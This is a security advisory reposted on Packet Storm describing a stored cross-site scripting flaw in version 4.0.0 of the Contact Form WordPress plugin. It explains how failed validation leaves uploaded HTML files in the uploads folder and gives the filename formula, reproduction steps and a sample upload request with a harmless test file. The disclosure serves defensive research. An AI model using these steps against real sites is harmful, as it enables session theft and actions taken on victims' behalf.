what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Contact Form 4.0.0 Cross Site Scripting

WordPress Contact Form 4.0.0 Cross Site Scripting
Posted Mar 3, 2017
Authored by Securify B.V., Julien Rentrop

WordPress Contact Form plugin version 4.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 584dc6e15f6a3d8fd4dd2df04a59176bf53f2fe05a39c7749e9ccb90cecf014d

WordPress Contact Form 4.0.0 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Stored Cross-Site Scripting vulnerability in Contact Form WordPress
Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Contact
Form WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0042

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Contact Form by BestWebSoft
WordPress Plugin version 4.0.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is partially resolved in Contact Form version 4.0.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_contact_form_wordpress_plugin.html

When enabled an attachment can be uploaded in the contact form. The upload accepts html files which will be stored in the /wp-content/uploads directory. Since we can control the contents of this html file we can use this as a way to create a Cross-Site Scripting attack.

The attack here is possible since the validation fails and the unlink function which cleans up the file is not executed.

Tried to escalate this attack further by getting code execution (uploading php file), however this is defended by a white list.

Source file: https://plugins.svn.wordpress.org/contact-form-plugin/trunk/contact_form.php

When apache is configured to show directory listings it's easier to exploit this attack since we don't need to generate the file name. When directory listings is not enabled this attack should still be possible, since the file name is generated with this code:

md5( sanitize_file_name( $_FILES["cntctfrm_contact_attachment"]["name"] ) . time() . $email )

Only time of the server is not exactly known, but could be determined.
Proof of concept

#1 Manual (Or see example request):
Go to page with contact form, select a html file, set some invalid input (such as email: invalid@@@), send.

#2 Navigate to uploaded file:
http://<target>/wp-content/uploads/

#3 Example of stored file:
http://<target>/wp-content/uploads/2016/07/cntctfrm_a407baae7f961b445422446f75575e89_test.html

Request example:

POST / HTTP/1.1
Host: <target>
Content-Length: 605
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPcjU2MvmAMp3t8r0
Connection: close

------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_attachment"; filename="test.html"
Content-Type: text/html

<html>
<body>
Hello world html
</body>
</html>
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_contact_action"

send
------WebKitFormBoundaryPcjU2MvmAMp3t8r0
Content-Disposition: form-data; name="cntctfrm_language"

default
------WebKitFormBoundaryPcjU2MvmAMp3t8r0--


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close